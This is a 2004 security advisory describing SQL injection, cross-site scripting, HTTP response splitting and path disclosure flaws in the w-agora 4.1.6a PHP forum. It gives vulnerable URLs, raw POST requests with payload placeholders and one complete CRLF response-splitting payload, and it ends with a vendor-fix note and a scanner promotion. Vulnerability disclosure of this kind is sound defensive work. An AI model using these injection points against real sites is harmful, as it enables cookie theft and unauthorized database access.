http://www.maxpatrol.com/mp_advisory.asp Title: Multiple vulnerabilities in w-agora forum Date: 28.09.04 Severity: Medium Application: w-agora 4.1.6a, http://www.w-agora/en/download.php Platform: PHP I. DESCRIPTION Multiple vulnerabilities were found in w-agora forum. A remote user can conduct SQL injection attack, HTTP response splitting and Cross site Scripting attack. 1. SQL injection redir_url.php?bn=demos_links&key=[SQL] 2. XSS in GET: download_thread.php?site=support&bn=support_install&thread=[XSS code here] 3. XSS in POST: POST /login.php HTTP/1.1 Host: w-agora Content-Type: application/x-www-form-urlencoded Content-Length: 89 loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1 POST /forgot_password.php HTTP/1.1 Host: w-agora Content-Type: application/x-www-form-urlencoded Content-Length: 48 go=1&userid=[XSS code here] 4. HTTP response splitting /subscribe_thread.php?site=support&bn=support_in stall&thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aConte nt-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScan ned%20by%20PTsecurity%3c/html%3e%0d%0a 5. Path discourse /list.php?bn=support_install&last=19&collapse=|id| II. IMPACT ---------- A remote user can access the target user's cookies (including authentication cookies). A remote user can cause SQL commands to be executed by the underlying database. III. SOLUTION ------------- Yes IV. VENDOR FIX/RESPONSE ----------------------- Yes, Fixed in CVS : subscribe_thread.php3,v 1.17, forgot_password.php3 v1.17, include/auth.php v1.45, list.php3 v1.53, V. CREDIT ------------- This vulnerability was discovered by Positive Technologies using MaxPatrol (www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet. MaxPatrol's intelligent algorithms are also capable to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting and other).